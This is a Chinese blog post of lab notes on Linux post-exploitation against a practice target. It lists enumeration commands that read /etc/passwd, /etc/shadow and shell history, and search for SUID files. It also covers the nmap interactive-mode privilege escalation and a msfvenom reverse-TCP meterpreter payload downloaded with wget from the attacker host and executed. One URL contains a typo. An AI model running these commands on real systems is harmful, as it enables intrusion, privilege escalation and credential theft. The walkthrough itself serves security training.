linux信息搜集

目录

1. linux信息搜集

2. nmap漏洞复现

3. msf linux模块反弹shell

1. linux信息搜集

id 查看当前用户的权限和所在的管理组

python -c "import pty;pty.spawn('/bin/bash');" 会话提升

uname -a 查看linux版本内核信息

cat /etc/*release 查看linux发行信息

dpkg -l 查看安装的包

crontab -l 是否有计划任务（这边显示没有计划任务）

/sbin/ifconfig -a 查看ip地址等

cat /etc/passwd 普通用户可以查看用户的信息

cat /etc/shadow 账号密码信息（root权限）（这边显示没有权限）

cat /root/.mysql_history 查看mysql历史操作（靶机和kali都未对mysql进行过操作所以没有这个文件）

cat /root/.bash_history 查看用户指令历史记录

cat /proc/version   查看内核信息

find / -perm -u=s -type f 2>/dev/null        匹配高权限的文件，看是否有利用点

/：代表查询位置，当前设置为根目录

-perm：代表权限

-u=s：代表用户的权限 s：superbin

-type：类型 ，f代表文件 file

2. nmap漏洞复现

nmap --interactive    -->!sh           利用nmap3.5<4.6.4之间存在的漏洞进行提权

3. msf linux模块反弹shell

先在kali上生成木马

msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp lhost=192.168.227.129 lport=4444 -f elf -o xx.elf                           linux的x86 payload需要跟上x86

首先先然metasploit2下载kali上的木马文件

wget http://1192.168.227.129:80/xx.elf                      linux从命令行下载网页文件

然后将文件赋予能执行的权利（这里为了方便直接给了4777）

chmod 4777 xx.elf                     修改文件权限

因为是linux系统所以在设置监听的payload的时候需要也是linux

linux执行xx.elf文件

成功进入到meterpreter界面

最新文章

1. 【css3笔记】---- 渐变的秘密
2. 速战速决 (3) - PHP: 函数基础, 函数参数, 函数返回值, 可变函数, 匿名函数, 闭包函数, 回调函数
3. JS-制作网页特效——选项卡效果（水平，点击）
4. MVC显示Base64图片
5. 在Web Service中傳送Dictionary
6. IDG合伙人李丰：O2O中的C2C蕴藏巨大商机
7. 关于 cookie 使用中遇到的问题
8. Redis-安装、启动
9. HDU 4763 Theme Section(KMP灵活应用）
10. bzoj3545 Peaks
11. JavaEE学习总结（十二）—MyEclipse开发工具与HTML
12. 洛谷1894 [USACO4.2]完美的牛栏The Perfect Stall
13. 内网服务器通过Squid代理访问外网
14. angularJS 事件广播与接收[转]
15. Spring4.x所有Maven依赖
16. 【codeforces 235E】 Number Challenge
17. PDF文档小技巧整理一览
18. 冒泡排序算法-Python实现
19. PHP——数组中的each(),list()和while循环遍历数组
20. word 快捷键

热门文章

1. 为了省钱，我用1天时间把PHP学了！
2. 《罗辑思维》试读：U盘化生存
3. 多测师讲解html _图片标签003_高级讲师肖sir
4. 解读JVM虚拟机
5. 关于【s】和[t]字符
6. python程序整理(1)
7. 【C语言编程入门笔记】排序算法之快速排序，一文轻松掌握快排！
8. CSP-S2020AFO记
9. go 实现websocket推送
10. centos8平台yum无法安装一些常用软件的解决，如：screen,iftop,nethogs